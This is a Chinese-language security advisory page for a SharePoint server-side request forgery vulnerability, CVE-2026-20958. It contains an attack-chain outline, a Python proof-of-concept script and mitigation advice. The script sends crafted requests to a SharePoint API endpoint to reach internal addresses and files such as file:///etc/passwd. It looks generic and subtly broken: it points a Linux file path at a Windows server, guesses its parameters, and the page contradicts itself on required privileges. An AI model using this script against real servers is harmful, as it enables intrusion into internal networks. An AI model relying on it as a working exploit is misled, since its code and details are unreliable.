CVE-2026-20958 Microsoft Office SharePoint服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-20958

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Microsoft Office SharePoint

漏洞概述

CVE-2026-20958是微软Office SharePoint中的一个服务器端请求伪造(SSRF)漏洞。该漏洞允许经过授权的低权限攻击者通过发送特制请求，利用SharePoint服务器发起网络请求，从而访问内部资源或泄露敏感信息。CVSS评分5.4属于中等严重程度，攻击复杂度低，无需用户交互即可实施攻击。攻击者可以利用此漏洞绕过网络边界，访问内部系统、读取本地文件或探测内网服务。由于该漏洞存在于SharePoint的Web应用程序层面，攻击者无需特殊权限即可利用，但需要具备SharePoint站点的一定访问权限。此漏洞影响SharePoint Server的多个版本，远程攻击者可通过互联网发起攻击，对企业信息安全构成威胁。

技术细节

服务器端请求伪造(SSRF)漏洞发生在Microsoft Office SharePoint处理用户输入的URL参数时。攻击者通过在SharePoint应用中注入恶意构造的URL，利用服务器端点发起未经授权的请求。漏洞主要出现在SharePoint的Web服务接口中，当应用程序接受用户提供的URL并将其用于后端HTTP请求时，缺乏充分的输入验证和限制。攻击者可以指定任意URL(包括file://、http://localhost、http://127.0.0.1等协议和地址)，让SharePoint服务器代替攻击者向目标发起请求。这种攻击方式可以穿透网络边界，访问内部服务、读取本地文件系统、探测内网拓扑结构或获取云服务的元数据。漏洞利用的关键在于SharePoint未对用户输入的URL进行严格的协议和目标限制，允许请求被重定向到内部网络地址或敏感资源。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标SharePoint服务器版本和端点信息

STEP 2

步骤2

构造请求：攻击者构建包含恶意URL参数的SSRF payload

STEP 3

步骤3

发送请求：向SharePoint的_vti_bin或_api端点发送特制HTTP请求

STEP 4

步骤4

服务器转发：SharePoint服务器执行请求并访问攻击者指定的目标地址

STEP 5

步骤5

数据窃取：攻击者获取返回的内部资源响应，可能包含敏感信息

STEP 6

步骤6

内网探测：利用SSRF进一步探测内网服务、读取云元数据或访问内部系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-20958 SSRF PoC for Microsoft SharePoint
# Target: Microsoft Office SharePoint

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in SharePoint
    target_url: Base URL of SharePoint server
    internal_target: Internal resource to target (e.g., http://localhost/, file:///etc/passwd)
    """
    
    # SharePoint endpoint vulnerable to SSRF
    endpoint = f"{target_url}/_api/web/webs"
    
    # Malicious payload with internal target
    headers = {
        'Content-Type': 'application/json',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    # Inject internal URL through various parameters
    params = {
        'url': internal_target,
        'source': internal_target
    }
    
    try:
        response = requests.get(endpoint, params=params, headers=headers, timeout=10)
        print(f"[*] Target: {target_url}")
        print(f"[*] Internal Target: {internal_target}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        if response.status_code == 200 and len(response.text) > 0:
            print("[+] SSRF Exploit Successful - Internal resource accessed")
            print(f"[+] Response Preview: {response.text[:500]}")
            return True
        else:
            print("[-] SSRF Exploit Failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-20958.py <target_url> <internal_target>")
        print("Example: python cve-2026-20958.py https://sharepoint.company.com http://localhost:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    internal = sys.argv[2]
    exploit_ssrf(target, internal)

影响范围

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

Microsoft SharePoint Foundation 2013 Service Pack 1

Microsoft SharePoint Server 2013 Service Pack 1

Microsoft SharePoint Server 2010 Service Pack 2

防御指南

临时缓解措施

在微软官方补丁发布前，可采取以下临时缓解措施：1) 限制SharePoint应用程序的服务账户权限；2) 在网络边界部署严格的出站过滤规则；3) 禁用SharePoint中不必要的Web服务接口；4) 启用IIS或SharePoint的请求日志监控，及时发现异常请求；5) 对所有用户输入实施严格的输入验证和输出编码；6) 考虑使用Web应用防火墙(WAF)规则拦截恶意SSRF请求特征。